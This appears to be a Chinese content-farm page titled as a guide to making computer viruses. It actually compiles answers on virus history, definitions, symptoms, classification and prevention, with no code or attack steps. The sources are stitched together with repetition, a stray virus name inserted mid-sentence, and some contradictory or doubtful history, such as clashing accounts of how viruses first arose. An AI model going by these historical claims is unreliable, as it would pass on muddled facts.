程序員教你怎樣製作電腦病毒

⑴ 誰知道電腦病毒是這樣產生的

最早由馮·諾伊曼提出一種可能性----現在稱為病毒，但沒引起注意。

1975 年，美國科普作家約翰·布魯勒爾 (John Brunner) 寫了一本名為《震盪波騎士》(Shock Wave Rider) 的書，該書第一次描寫了在信息社會中，計算機作為正義和邪惡雙方斗爭的工具的故事，成為當年最佳暢銷書之一。

1977 年夏天，托馬斯·捷·瑞安 (Thomas.J.Ryan) 的科幻小說《P-1的春天》(The Adolescence of P-1) 成為美國的暢銷書，作者在這本書中描寫了一種可以在計算機中互相傳染的病毒，病毒最後控制了 7,000 台計算機，造成了一場災難。

1983 年 11 月 3 日，弗雷德·科恩 (Fred Cohen) 博士研製出一種在運行過程中可以復制自身的破壞性程序，倫·艾德勒曼 (Len Adleman) 將它命名為計算機病毒(computer viruses)，並在每周一次的計算機安全討論會上正式提出，8 小時後專家們在 VAX11/750 計算機系統上運行，第一個病毒實驗成功，一周後又獲准進行 5 個實驗的演示，從而在實驗上驗證了計算機病毒的存在。

1986 年初，在巴基斯坦的拉合爾 (Lahore)，巴錫特 (Basit) 和阿姆傑德(Amjad) 兩兄弟經營著一家 IBM-PC 機及其兼容機的小商店。他們編寫了Pakistan 病毒，即Brain。在一年內流傳到了世界各地。

1988 年 3 月 2 日，一種蘋果機的病毒發作，這天受感染的蘋果機停止工作，只顯示「向所有蘋果電腦的使用者宣布和平的信息」。以慶祝蘋果機生日。

1988 年 11 月 2 日，美國六千多台計算機被病毒感染，造成 Internet不能正常運行。這是一次非常典型的計算機病毒入侵計算機網路的事件，迫使美國政府立即作出反應，國防部成立了計算機應急行動小組。這次事件中遭受攻擊的包括 5 個計算機中心和 12 個地區結點，連接著政府、大學、研究所和擁有政府合同的 250,000 台計算機。這次病毒事件，計算機系統直接經濟損失達 9600 萬美元。這個病毒程序設計者是羅伯特·莫里斯 (Robert T.Morris)，當年 23 歲，是在康乃爾 (Cornell) 大學攻讀學位的研究生。

羅伯特·莫里斯設計的病毒程序利用了系統存在的弱點。由於羅伯特·莫里斯成了入侵 ARPANET 網的最大的電子入侵者，而獲准參加康乃爾大學的畢業設計，並獲得哈佛大學 Aiken 中心超級用戶的特權。他也因此被判 3 年緩刑，罰款 1 萬美元，他還被命令進行 400 小時的新區服務。

1988 年底，在我國的國家統計部門發現小球病毒。

註：在此文中，把蠕蟲、我們常提的病毒定為病毒不同種類。
（www.chinakv.com，2000-11-01）

l 重溫電腦病毒史
你可知道，電腦病毒的概念來自一場游戲？

電腦病毒的起源

電腦病毒的概念其實源起相當早，在第一部商用電腦出現之前好幾年時，電腦的先驅者馮·諾伊曼（John Von Neumann）在他的一篇論文《復雜自動裝置的理論及組識的進行》里，已經勾勒出病毒程序的藍圖。不過在當時，絕大部分的電腦專家都無法想像會有這種能自我繁殖的程序。

1975年，美國科普作家約翰·布魯勒爾（John Brunner）寫了一本名為《震盪波騎士》（Shock Wave Rider）的書，該書第一次描寫了在信息社會中，計算機作為正義和邪惡雙方斗爭的工具的故事，成為當年最佳暢銷書之一。

1977年夏天，托馬斯·捷·瑞安（Thomas.J.Ryan）的科幻小說《P-1的春天》（The Adolescence of P-1）成為美國的暢銷書，作者在這本書中描寫了一種可以在計算機中互相傳染的病毒，病毒最後控制了 7,000 台計算機，造成了一場災難。 虛擬科幻小說世界中的東西，在幾年後終於逐漸開始成為電腦使用者的噩夢。

而差不多在同一時間，美國著名的AT&T貝爾實驗室中，三個年輕人在工作之餘，很無聊的玩起一種游戲:彼此撰寫出能夠吃掉別人程序的程序來互相作戰。這個叫做"磁芯大戰"（core war）的游戲，進一步將電腦病毒"感染性"的概念體現出來。

1983年11月3日，一位南加州大學的學生弗雷德·科恩（Fred Cohen）在UNIX系統下，寫了一個會引起系統死機的程序，但是這個程序並未引起一些教授的注意與認同。科恩為了證明其理論而將這些程序以論文發表，在當時引起了不小的震撼。科恩的程序，讓電腦病毒具備破壞性的概念具體成形。

不過，這種具備感染與破壞性的程序被真正稱之為"病毒"，則是在兩年後的一本《科學美國人》的月刊中。一位叫作杜特尼（A.K.Dewdney）的專欄作家在討論"磁芯大戰"與蘋果二型電腦（別懷疑，當時流行的正是蘋果二型電腦，在那個時侯，我們熟悉的PC根本還不見蹤影）時，開始把這種程序稱之為病毒。從此以後我們對於這種具備感染或破壞性的程序，終於有一個"病毒"的名字可以稱呼了。

第一個真正的電腦病毒

到了1987年，第一個電腦病毒C-BRAIN終於誕生了（這似乎不是一件值得慶賀的事）。一般而言，業界都公認這是真正具備完整特徵的電腦病毒始祖。這個病毒程序是由一對巴基斯坦兄弟：巴斯特（Basit）和阿姆捷特（Amjad）所寫的，他們在當地經營一家販賣個人電腦的商店，由於當地盜拷軟體的風氣非常盛行，因此他們的目的主要是為了防止他們的軟體被任意盜拷。只要有人盜拷他們的軟體，C-BRAIN就會發作，將盜拷者的硬碟剩餘空間給吃掉。

這個病毒在當時並沒有太大的殺傷力，但後來一些有心人士以C-BRAIN為藍圖，製作出一些變形的病毒。而其他新的病毒創作，也紛紛出籠，不僅有個人創作，甚至出現不少創作集團（如NuKE,Phalcon/Skism,VDV）。各類掃毒、防毒與殺毒軟體以及專業公司也紛紛出現。一時間，各種病毒創作與反病毒程序，不斷推陳出新，如同百家爭鳴。

DOS時代的著名病毒

所謂"DOS時代的病毒"，意思是說這是從DOS時代就有的老古董，諸位讀者可別以為您現在已經進入Windows 95/98的年代，就不會感染DOS時期的病毒。其實由於Windows 95/98充其量不過是一套架構在DOS上的操作系統，因此即使是處在Windows 95/98之下，一不小心還是會惹火上身的！

耶路撒冷（Jerusalem）
這個古董級病毒其實有個更廣為人知的別稱，叫做"黑色星期五"。為什麼會有這么有趣的別稱？道理很簡單:因為只要每逢十三號又是星期五的日子，這個病毒就會發作。而發作時將會終止所有使用者所執行的程序，症狀相當兇狠。

米開朗基羅（Michelangelo）
米開朗基羅的名字，對於一些早一點的電腦使用者而言，真可說是大名鼎鼎，如雷貫耳。著名的原因除了它擁有一代藝術大師米開朗基羅的名字之外，更重要的是它的殺傷力驚人:每年到了3月6日米開朗基羅生日（這也就是它為什麼叫做"米開朗基羅"的原因）時，這個病毒就會以Format硬碟來為這位大師祝壽。於是乎，你辛苦建立的所有資料都毀於一旦，永無翻身之日。

猴子（Monkey）
Monkey據說是第一個"引導型"的病毒，只要你使用被Monkey感染過的系統軟盤開機，病毒就會入侵到你的電腦中，然後伺機移走硬碟的分區表，讓你一開機就會出現"Invalid drive specification"的信息。比起"文件型"病毒只有執行過受感染文件才會中毒的途徑而言，Monkey的確是更為難纏了。

音樂蟲病毒（Music Bug）
這個發作時會大聲唱歌，甚至造成資料流失、無法開機的病毒，正是台灣土產的病毒。所以，當你聽到電腦自動傳來一陣陣音樂聲時，別以為你的電腦比別人聰明，那很有可能是中毒了。
其實這種會唱歌的病毒也不少，有另一個著名的病毒（叫什麼名字倒忘了）發作時還會高唱著"兩只老虎"呢！

DOS時期的病毒，種類相當繁雜，而且不斷有人改寫現有的病毒。到了後期甚至有人寫出所謂的"雙體引擎"，可以把一種病毒創造出更多元化的面貌，讓人防不勝防！而病毒發作的症狀更是各式各樣，有的會唱歌、有的會刪除文件、有的會Format硬碟、有的還會在屏幕上顯出各式各樣的圖形與音效。不過幸運的 是，這些DOS時期的古董級病毒，由於大部分的殺毒軟體都可以輕易地掃除，所以殺傷力已經大不如前了。

Windows時期的來臨

隨著Windows 3.1在全球的風行，正式宣告了個人電腦操作環境進入Windows時代。緊接著，Windows 95/98的大為暢銷，使得現在幾乎所有個人電腦的操作環境都是在Windows狀態下。而在Windows環境下最為知名的，大概就屬"宏病毒"與"32位病毒"了。

宏病毒
隨著各種Windows下套裝軟體的發展，許多軟體開始提供所謂"宏"的功能，讓使用者可以用"創造宏"的方式，將一些繁瑣的過程記錄成一個簡單的指令來方便自己操作。然而這種方便的功能，在經過有心人士的設計之後，終於又使得"文件型"病毒進入一個新的里程碑:傳統的文件型病毒只會感染後綴為exe和com的執行文件，而宏病毒則會感染Word、Excel、AmiPro、Access等軟體儲存的資料文件。更誇張的是，這種宏病毒是跨操作平台的。以Word的宏病毒為例，它可以感染DOS、Windows 3.1/95/98/NT、OS/2、麥金塔等等系統上的Word文件以及通用模板。
在這些宏病毒之中，最為有名的除了後面要講的Melissa就是令人聞之色變的Taiwan NO.1B 。這個病毒的發作情形是：到了每月的十三號，只要您隨便開啟一份Word文件，屏幕上會出現一對話窗口，詢問你一道龐雜的算數題。答錯的話（這種復雜的算數大概只有超人可以很快算出來吧）就會連續開啟二十個窗口，然後又出現另一道問題，如此重復下去，直到耗盡系統資源而死機為止。
雖然宏病毒有很高的傳染力，但幸運的是它的破壞能力並不太強，而且解毒方式也較容易，甚至不需殺毒軟體就可以自行手動解毒。

32位病毒
所謂"32位病毒"，則是在Windows 95之後所產生的一種新型態文件型病毒，它雖然同樣是感染exe執行文件，但是這種病毒專挑Windows的32位程序下手，其中最著名的就是去年大為流行的CIH病毒了。
CIH病毒的厲害之處，在於他可以把自己的本體拆散塞在被感染的文件中，因此受感染的文件大小不會有所變化，殺毒軟體也不易察覺。而最後一個版本的CIH病毒，除了每個月26日發作，將你的硬碟Format掉之外，有時候還會破壞主板BIOS內的資料，讓你根本無法開機！雖然目前大部分的殺毒軟體都有最新的病毒碼可以解決這只難纏的病毒，不過由於它的威力實在強大，大家還是小心為上。（CIH又可能在今年4月26發作，你不會有事吧？）

Internet的革命

有人說Internet的出現，引爆了新一波的信息革命。因為在網際網路上，人與人的距離被縮短到極小的距離，而各式各樣網站的建立以及搜尋引擎的運用，讓每個人都很容易從網路上獲得想要的信息。

Internet的盛行造就了信息的大量流通，但對於有心散播病毒、盜取他人帳號、密碼的電腦黑客來說，網路不折不扣正好提供了一個絕佳的渠道。也因此，我們這些一般的使用者，雖然享受到網際網路帶來的方便，同時卻也陷入另一個恐懼之中。

病毒散播的新捷徑

由於網際網路的便利，病毒的傳染途徑更為多元化。傳統的病毒可能以磁碟或其他存儲媒體的方式散布，而現在，你只要在電子郵件或ICQ中，夾帶一個文件寄給朋友，就可能把病毒傳染給他；甚至從網路上下載文件，都可能收到一個含有病毒的文件。

不過雖然網路使得病毒的散布更為容易，但其實這種病毒還是屬於傳統型的，只要不隨便從一些籍籍無名的網站下載文件(因為有名的網站為了不砸了自己的招牌，提供下載的文件大都經過殺毒處理)，安裝殺毒軟體，隨時更新病毒碼，下載後的文件不要急著執行，先進行查毒的步驟(因為受傳統病毒感染的程序，只要不去執行就不會感染與發作)，多半還是可以避免中毒的情形產生。

第二代病毒的崛起

前面所談的各式各樣的病毒，基本上都是屬於傳統型的病毒，也就是所謂"第一代病毒"。會有這樣的稱呼方式，主要是用來區分因為Internet蓬勃發展之後，最新出現的嶄新病毒。這種新出現的病毒，由於本質上與傳統病毒有很大的差異性，因此就有人將之稱為"第二代病毒"。

第二代病毒與第一代病毒最大的差異，就是在於第二代病毒傳染的途徑是基於瀏覽器的，這種發展真是有點令人瞠目結舌！

原來，為了方便網頁設計者在網頁上能製造出更精彩的動畫，讓網頁能更有空間感，幾家大公司聯手制訂出Active X及java的技術。而透過這些技術，甚至能夠分辨你使用的軟體版本，建議你應該下載哪些軟體來更新版本，對於大部分的一般使用者來說，是頗為方便的工具。但若想要讓這些網頁的動畫能夠正常執行，瀏覽器會自動將這些Active X及Java applets的程序下載到硬碟中。在這個過程中，惡性程序的開發者也就利用同樣的渠道，經由網路滲透到個人電腦之中了。這就是近來崛起的"第二代病毒"，也就是所謂的"網路病毒"。

兵來將擋，水來土掩

目前常見的第二代病毒，其實破壞性都不大，例如在瀏覽器中不斷開啟窗口的"窗口炸彈"，帶著電子計時器發出"咚咚"聲的"鬧鬧熊"等，只要把瀏覽器關閉後，對電腦並不會有任何影響。但隨著科技的日新月異，也難保不會出現更新、破壞性更大的病毒。

只是，我們也不需要因為這種趨勢而太過悲觀，更不用因噎廢食地拒絕使用電腦上網。整個電腦發展史上，病毒與殺毒軟體的對抗一直不斷的持續進行中，只要小心一點，還是可以愉快地暢游在網際網路的世界裡。

整理自《PCHOME》及"病毒觀察"網站

⑵ 什麼是電腦病毒電腦病毒怎樣產生電腦病毒怎樣入侵我的電腦

什麼是電腦病毒:
計算機病毒（Computer Virus）在《中華人民共和國計算機信息系統安全保護條例》中被明確定義，病毒指「編制者在計算機程序中插入的破壞計算機功能或者破壞數據，影響計算機使用並且能夠自 熊貓燒香病毒（尼姆亞病毒變種）我復制的一組計算機指令或者程序代碼」。與醫學上的「病毒」不同，計算機病毒不是天然存在的，是某些人利用計算機軟體和硬體所固有的脆弱性編制的一組指令集或程序代碼。它能通過某種途徑潛伏在計算機的存儲介質（或程序）里，當達到某種條件時即被激活，通過修改其他程序的方法將自己的精確拷貝或者可能演化的形式放入其他程序中，從而感染其他程序，對計算機資源進行破壞，所謂的病毒就是人為造成的，對其他用戶的危害性很大！
電腦病毒怎樣產生:
病毒不是來源於突發的原因。電腦病毒的製造卻來自於一次偶然的事件，那時的研究人員為了計算出當時互聯網的在線人數，然而它卻自己「繁殖」了起來導致了整個伺服器的崩潰和堵塞，有時一次突發的停電和偶然的錯誤，會在計算機的磁碟和內存中產生一些亂碼和隨機指令，但這些代碼是無序和混亂的，病毒則是一種比較完美的，精巧嚴謹的代碼，按照嚴格的秩序組織起來，與所在的系統網路環境相適應和配合起來，病毒不會通過偶然形成，並且需要有一定的長度，這個基本的長度從概率上來講是不可能通過隨機代碼產生的。現在流行的病毒是由人為故意編寫的，多數病毒可以找到作者和產地信息，從大量的統計分析來看，病毒作者主要情況和目的是：一些天才的程序員為了表現自己和證明自己的能力，出於對上司的不滿，為了好奇，為了報復，為了祝賀和求愛，為了得到控制口令，為了軟體拿不到報酬預留的陷阱等．當然也有因政治，軍事，宗教，民族．專利等方面的需求而專門編寫的，其中也包括一些病毒研究機構和黑客的測試病毒．
電腦病毒怎樣入侵我的電腦:
計算機病毒可通過各種可能的渠道，如軟盤、硬碟、移動硬碟、計算機網路去傳染其他的計算機。當您在一台機器上發現了病毒時，往往曾在這台計算機上用過的軟盤已感染上了病毒，而與這台機器相聯網的其他計算機也許也被該病毒染上了。是否具有傳染性是判別一個程序是否為計算機病毒的最重要條件。
來源:http://ke..com/view/3388.htm#4

⑶ 誰能給我簡述一下計算機病毒的工作原理

計算機病毒的定義

計算機病毒是一個程序，一段可執行碼 ,對計算機的正常使用進行破壞，使得電腦無法正常使用甚至整個操作系統或者電腦硬碟損壞。就像生物病毒一樣，計算機病毒有獨特的復制能力。計算機病毒可以很快地蔓延，又常常難以根除。它們能把自身附著在各種類型的文件上。當文件被復制或從一個用戶傳送到另一個用戶時，它們就隨同文件一起蔓延開來。這種程序不是獨立存在的，它隱蔽在其他可執行的程序之中，既有破壞性，又有傳染性和潛伏性。輕則影響機器運行速度，使機器不能正常運行；重則使機器處於癱瘓，會給用戶帶來不可估量的損失。通常就把這種具有破壞作用的程序稱為計算機病毒。

除復制能力外，某些計算機病毒還有其它一些共同特性：一個被污染的程序能夠傳送病毒載體。當你看到病毒載體似乎僅僅表現在文字和圖象上時，它們可能也已毀壞了文件、再格式化了你的硬碟驅動或引發了其它類型的災害。若是病毒並不寄生於一個污染程序，它仍然能通過占據存貯空間給你帶來麻煩，並降低你的計算機的全部性能。

1．計算機病毒的特點

計算機病毒具有以下幾個特點：

（1） 寄生性

計算機病毒寄生在其他程序之中，當執行這個程序時，病毒就起破壞作用，而在未啟動這個程序之前，它是不易被人發覺的。

（2） 傳染性

計算機病毒不但本身具有破壞性，更有害的是具有傳染性，一旦病毒被復制或產生變種，其速度之快令人難以預防。

（3） 潛伏性

有些病毒像定時炸彈一樣，讓它什麼時間發作是預先設計好的。比如黑色星期五病毒，不到預定時間一點都覺察不出來，等到條件具備的時候一下子就爆炸開來，對系統進行破壞。

（4） 隱蔽性

計算機病毒具有很強的隱蔽性，有的可以通過病毒軟體檢查出來，有的根本就查不出來，有的時隱時現、變化無常，這類病毒處理起來通常很困難。

2．計算機病毒的表現形式

計算機受到病毒感染後，會表現出不同的症狀，下邊把一些經常碰到的現象列出來，供用戶參考。

（1） 機器不能正常啟動

加電後機器根本不能啟動，或者可以啟動，但所需要的時間比原來的啟動時間變長了。有時會突然出現黑屏現象。

（2） 運行速度降低

如果發現在運行某個程序時，讀取數據的時間比原來長，存文件或調文件的時間都增加了，那就可能是由於病毒造成的。

（3） 磁碟空間迅速變小

由於病毒程序要進駐內存，而且又能繁殖，因此使內存空間變小甚至變為「0」，用戶什麼信息也進不去。

（4） 文件內容和長度有所改變

一個文件存入磁碟後，本來它的長度和其內容都不會改變，可是由於病毒的干擾，文件長度可能改變，文件內容也可能出現亂碼。有時文件內容無法顯示或顯示後又消失了。

（5） 經常出現「死機」現象

正常的操作是不會造成死機現象的，即使是初學者，命令輸入不對也不會死機。如果機器經常死機，那可能是由於系統被病毒感染了。

（6） 外部設備工作異常

因為外部設備受系統的控制，如果機器中有病毒，外部設備在工作時可能會出現一些異常情況，出現一些用理論或經驗說不清道不明的現象。

以上僅列出一些比較常見的病毒表現形式，肯定還會遇到一些其他的特殊現象，這就需要由用戶自己判斷了。

3.計算機病毒的預防

前面介紹了計算機病毒，現在講一下怎樣預防病毒的問題。首先，在思想上重視，加強管理，止病毒的入侵。凡是從外來的軟盤往機器中拷信息，都應該先對軟盤進行查毒，若有病毒必須清除，這樣可以保證計算機不被新的病毒傳染。此外，由於病毒具有潛伏性，可能機器中還隱蔽著某些舊病毒，一旦時機成熟還將發作，所以，要經常對磁碟進行檢查，若發現病毒就及時殺除。思想重視是基礎，採取有效的查毒與消毒方法是技術保證。檢查病毒與消除病毒目前通常有兩種手段，一種是在計算機中加一塊防病毒卡，另一種是使用防病毒軟體工作原理基本一樣，一般用防病毒軟體的用戶更多一些。切記要注意一點，預防與消除病毒是一項長期的工作任務，不是一勞永逸的，應堅持不懈。

計算機病毒是在什麼情況下出現的?

計算機病毒的產生是計算機技術和以計算機為核心的社會信息化進程發展到一定階段的必然產物。它產生的背景是：

（1）計算機病毒是計算機犯罪的一種新的衍化形式

計算機病毒是高技術犯罪, 具有瞬時性、動態性和隨機性。不易取證, 風險小破壞大, 從而刺激了犯罪意識和犯罪活動。是某些人惡作劇和報復心態在計算機應用領域的表現。

（2）計算機軟硬體產品的危弱性是根本的技術原因

計算機是電子產品。數據從輸入、存儲、處理、輸出等環節, 易誤入、篡改、丟失、作假和破壞；程序易被刪除、改寫；計算機軟體設計的手工方式, 效率低下且生產周期長；人們至今沒有辦法事先了解一個程序有沒有錯誤, 只能在運行中發現、修改錯誤, 並不知道還有多少錯誤和缺陷隱藏在其中。這些脆弱性就為病毒的侵入提供了方便。

（3）微機的普及應用是計算機病毒產生的必要環境

1983年11月3日美國計算機專家首次提出了計算機病毒的概念並進行了驗證。幾年前計算機病毒就迅速蔓延, 到我國才是近年來的事。而這幾年正是我國微型計算機普及應用熱潮。微機的廣泛普及, 操作系統簡單明了, 軟、硬體透明度高, 基本上沒有什麼安全措施, 能夠透徹了解它內部結構的用戶日益增多, 對其存在的缺點和易攻擊處也了解的越來越清楚, 不同的目的可以做出截然不同的選擇。目前, 在IBM PC系統及其兼容機上廣泛流行著各種病毒就很說明這個問題。

計算機病毒是如何分類的?

計算機病毒可以從不同的角度分類。若按其表現性質可分為良性的和惡性的。良性的危害性小, 不破壞系統和數據, 但大量佔用系統開銷, 將使機器無法正常工作，陷於癱瘓。如國內出現的圓點病毒就是良性的。惡性病毒可能會毀壞數據文件, 也可能使計算機停止工作。若按激活的時間可分為定時的和隨機的。定時病毒僅在某一特定時間才發作, 而隨機病毒一般不是由時鍾來激活的。若按其入侵方式可分操作系統型病毒（ 圓點病毒和大麻病毒是典型的操作系統病毒）, 這種病毒具有很強的破壞力（用它自己的程序意圖加入或取代部分操作系統進行工作）, 可以導致整個系統的癱瘓；原碼病毒, 在程序被編譯之前插入到FORTRAN、C、或PASCAL等語言編制的源程序里, 完成這一工作的病毒程序一般是在語言處理程序或連接程序中；外殼病毒, 常附在主程序的首尾, 對源程序不作更改, 這種病毒較常見, 易於編寫, 也易於發現, 一般測試可執行文件的大小即可知；入侵病毒, 侵入到主程序之中, 並替代主程序中部分不常用到的功能模塊或堆棧區, 這種病毒一般是針對某些特定程序而編寫的。若按其是否有傳染性又可分為不可傳染性和可傳染性病毒。不可傳染性病毒有可能比可傳染性病毒更具有危險性和難以預防。若按傳染方式可分磁碟引導區傳染的計算機病毒、操作系統傳染的計算機病毒和一般應用程序傳染的計算機病毒。若按其病毒攻擊的機種分類, 攻擊微型計算機的, 攻擊小型機的, 攻擊工作站的, 其中以攻擊微型計算機的病毒為多, 世界上出現的病毒幾乎90％是攻擊IBM PC機及其兼容機。

計算機病毒的定義

一 計算機病毒的定義計算機病毒(Computer Virus)在《中華人民共和國計算機信息系統安全保護條例》中被明確定義，病毒「指編制或者在計算機程序中插入的破壞計算機功能或者破壞數據，影響計算機使用並且能夠自我復制的一組計算機指令或者程序代碼」。

二 計算機病毒的特點計算機病毒是人為的特製程序，具有自我復制能力，很強的感染性，一定的潛伏性，特定的觸發性和很大的破壞性。

三 病毒存在的必然性計算機的信息需要存取、復制、傳送，病毒作為信息的一種形式可以隨之繁殖、感染、破壞，而當病毒取得控制權之後，他們會主動尋找感染目標，使自身廣為流傳。

四 計算機病毒的長期性病毒往往會利用計算機操作系統的弱點進行傳播，提高系統的安全性是防病毒的一個重要方面，但完美的系統是不存在的，過於強調提高系統的安全性將使系統多數時間用於病毒檢查，系統失去了可用性、實用性和易用性，另一方面，信息保密的要求讓人們在泄密和抓住病毒之間無法選擇。病毒與反病毒將作為一種技術對抗長期存在，兩種技術都將隨計算機技術的發展而得到長期的發展。

五 計算機病毒的產生病毒不是來源於突發或偶然的原因．一次突發的停電和偶然的錯誤，會在計算機的磁碟和內存中產生一些亂碼和隨機指令，但這些代碼是無序和混亂的，病毒則是一種比較完美的，精巧嚴謹的代碼，按照嚴格的秩序組織起來，與所在的系統網路環境相適應和配合起來，病毒不會通過偶然形成，並且需要有一定的長度，這個基本的長度從概率上來講是不可能通過隨機代碼產生的。病毒是人為的特製程序現在流行的病毒是由人為故意編寫的，多數病毒可以找到作者信息和產地信息，通過大量的資料分析統計來看，病毒作者主要情況和目的是：一些天才的程序員為了表現自己和證明自己的能力，處於對上司的不滿，為了好奇，為了報復，為了祝賀和求愛，為了得到控制口令，為了軟體拿不到報酬預留的陷阱等．當然也有因政治，軍事，宗教，民族．專利等方面的需求而專門編寫的，其中也包括一些病毒研究機構和黑客的測試病毒．

六 計算機病毒分類根據多年對計算機病毒的研究，按照科學的、系統的、嚴密的方法，計算機病毒可分類如下：按照計算機病毒屬性的方法進行分類，計算機病毒可以根據下面的屬性進行分類：

其他計算機病毒介紹

按照計算機病毒存在的媒體進行分類根據病毒存在的媒體，病毒可以劃分為網路病毒，文件病毒，引導型病毒。網路病毒通過計算機網路傳播感染網路中的可執行文件，文件病毒感染計算機中的文件（如：COM，EXE，DOC等），引導型病毒感染啟動扇區（Boot）和硬碟的系統引導扇區（MBR），還有這三種情況的混合型，例如：多型病毒（文件和引導型）感染文件和引導扇區兩種目標，這樣的病毒通常都具有復雜的演算法，它們使用非常規的辦法侵入系統，同時使用了加密和變形演算法。 按照計算機病毒傳染的方法進行分類根據病毒傳染的方法可分為駐留型病毒和非駐留型病毒，駐留型病毒感染計算機後，把自身的內存駐留部分放在內存（RAM）中，這一部分程序掛接系統調用並合並到操作系統中去,他處於激活狀態,一直到關機或重新啟動.非駐留型病毒在得到機會激活時並不感染計算機內存,一些病毒在內存中留有小部分,但是並不通過這一部分進行傳染,這類病毒也被劃分為非駐留型病毒。 按照計算機病毒破壞的能力進行分類根據病毒破壞的能力可劃分為以下幾種：無害型除了傳染時減少磁碟的可用空間外，對系統沒有其它影響。無危險型這類病毒僅僅是減少內存、顯示圖像、發出聲音及同類音響。危險型這類病毒在計算機系統操作中造成嚴重的錯誤。非常危險型這類病毒刪除程序、破壞數據、清除系統內存區和操作系統中重要的信息。這些病毒對系統造成的危害，並不是本身的演算法中存在危險的調用，而是當它們傳染時會引起無法預料的和災難性的破壞。由病毒引起其它的程序產生的錯誤也會破壞文件和扇區，這些病毒也按照他們引起的破壞能力劃分。一些現在的無害型病毒也可能會對新版的DOS、Windows和其它操作系統造成破壞。例如：在早期的病毒中，有一個「Denzuk」病毒在360K磁碟上很好的工作，不會造成任何破壞，但是在後來的高密度軟盤上卻能引起大量的數據丟失。 按照計算機病毒特有的演算法進行分類根據病毒特有的演算法，病毒可以劃分為：伴隨型病毒這一類病毒並不改變文件本身，它們根據演算法產生EXE文件的伴隨體，具有同樣的名字和不同的擴展名（COM），例如：XCOPY.EXE的伴隨體是XCOPY.COM。病毒把自身寫入COM文件並不改變EXE文件，當DOS載入文件時，伴隨體優先被執行到，再由伴隨體載入執行原來的EXE文件。「蠕蟲」型病毒通過計算機網路傳播，不改變文件和資料信息，利用網路從一台機器的內存傳播到其它機器的內存，計算網路地址，將自身的病毒通過網路發送。有時它們在系統存在，一般除了內存不佔用其它資源。寄生型病毒除了伴隨和「蠕蟲」型，其它病毒均可稱為寄生型病毒，它們依附在系統的引導扇區或文件中，通過系統的功能進行傳播，按其演算法不同可分為：練習型病毒病毒自身包含錯誤，不能進行很好的傳播，例如一些病毒在調試階段。詭秘型病毒它們一般不直接修改DOS中斷和扇區數據，而是通過設備技術和文件緩沖區等DOS內部修改，不易看到資源，使用比較高級的技術。利用DOS空閑的數據區進行工作。變型病毒（又稱幽靈病毒）這一類病毒使用一個復雜的演算法，使自己每傳播一份都具有不同的內容和長度。它們一般的作法是一段混有無關指令的解碼演算法和被變化過的病毒體組成。

七、計算機病毒的發展在病毒的發展史上，病毒的出現是有規律的，一般情況下一種新的病毒技術出現後，病毒迅速發展，接著反病毒技術的發展會抑制其流傳。操作系統升級後，病毒也會調整為新的方式，產生新的病毒技術。它可劃分為：

DOS引導階段

1987年，計算機病毒主要是引導型病毒，具有代表性的是「小球」和「石頭」病毒。當時的計算機硬體較少,功能簡單,一般需要通過軟盤啟動後使用.引導型病毒利用軟盤的啟動原理工作,它們修改系統啟動扇區,在計算機啟動時首先取得控制權,減少系統內存,修改磁碟讀寫中斷,影響系統工作效率,在系統存取磁碟時進行傳播.1989年,引導型病毒發展為可以感染硬碟,典型的代表有「石頭2」。 DOS可執行階段1989年,可執行文件型病毒出現,它們利用DOS系統載入執行文件的機制工作,代表為「耶路撒冷」,「星期天」病毒,病毒代碼在系統執行文件時取得控制權,修改DOS中斷,在系統調用時進行傳染,並將自己附加在可執行文件中,使文件長度增加。1990年,發展為復合型病毒,可感染COM和EXE文件。 伴隨,批次型階段1992年,伴隨型病毒出現,它們利用DOS載入文件的優先順序進行工作，具有代表性的是「金蟬」病毒,它感染EXE文件時生成一個和EXE同名但擴展名為COM的伴隨體；它感染文件時,改原來的COM文件為同名的EXE文件,再產生一個原名的伴隨體,文件擴展名為COM，這樣,在DOS載入文件時,病毒就取得控制權.這類病毒的特點是不改變原來的文件內容,日期及屬性,解除病毒時只要將其伴隨體刪除即可。在非DOS操作系統中,一些伴隨型病毒利用操作系統的描述語言進行工作,具有典型代表的是「海盜旗」病毒,它在得到執行時,詢問用戶名稱和口令,然後返回一個出錯信息,將自身刪除。批次型病毒是工作在DOS下的和「海盜旗」病毒類似的一類病毒。 幽靈,多形階段1994年,隨著匯編語言的發展,實現同一功能可以用不同的方式進行完成,這些方式的組合使一段看似隨機的代碼產生相同的運算結果。幽靈病毒就是利用這個特點,每感染一次就產生不同的代碼。例如「一半」病毒就是產生一段有上億種可能的解碼運算程序,病毒體被隱藏在解碼前的數據中,查解這類病毒就必須能對這段數據進行解碼,加大了查毒的難度。多形型病毒是一種綜合性病毒,它既能感染引導區又能感染程序區,多數具有解碼演算法,一種病毒往往要兩段以上的子程序方能解除。 生成器,變體機階段1995年,在匯編語言中,一些數據的運算放在不同的通用寄存器中,可運算出同樣的結果,隨機的插入一些空操作和無關指令,也不影響運算的結果,這樣,一段解碼演算法就可以由生成器生成，當生成器的生成結果為病毒時,就產生了這種復雜的「病毒生成器」 ，而變體機就是增加解碼復雜程度的指令生成機制。這一階段的典型代表是「病毒製造機」 VCL,它可以在瞬間製造出成千上萬種不同的病毒,查解時就不能使用傳統的特徵識別法,需要在宏觀上分析指令,解碼後查解病毒。 網路,蠕蟲階段1995年,隨著網路的普及,病毒開始利用網路進行傳播,它們只是以上幾代病毒的改進.在非DOS操作系統中,「蠕蟲」是典型的代表,它不佔用除內存以外的任何資源,不修改磁碟文件,利用網路功能搜索網路地址,將自身向下一地址進行傳播，有時也在網路伺服器和啟動文件中存在。 視窗階段1996年,隨著Windows和Windows95的日益普及,利用Windows進行工作的病毒開始發展,它們修改(NE,PE)文件,典型的代表是DS.3873,這類病毒的機制更為復雜,它們利用保護模式和API調用介面工作,解除方法也比較復雜。 宏病毒階段1996年,隨著Windows Word功能的增強,使用Word宏語言也可以編制病毒,這種病毒使用類Basic語言,編寫容易,感染Word文檔等文件，在Excel和AmiPro出現的相同工作機制的病毒也歸為此類，由於Word文檔格式沒有公開,這類病毒查解比較困難 互連網階段1997年,隨著網際網路的發展,各種病毒也開始利用網際網路進行傳播,一些攜帶病毒的數據包和郵件越來越多,如果不小心打開了這些郵件,機器就有可能中毒. 爪哇(Java),郵件炸彈階段1997年,隨著萬維網（Wold Wide Web）上Java的普及,利用Java語言進行傳播和資料獲取的病毒開始出現,典型的代表是JavaSnake病毒，還有一些利用郵件伺服器進行傳播和破壞的病毒，例如Mail-Bomb病毒，它會嚴重影響網際網路的效率。

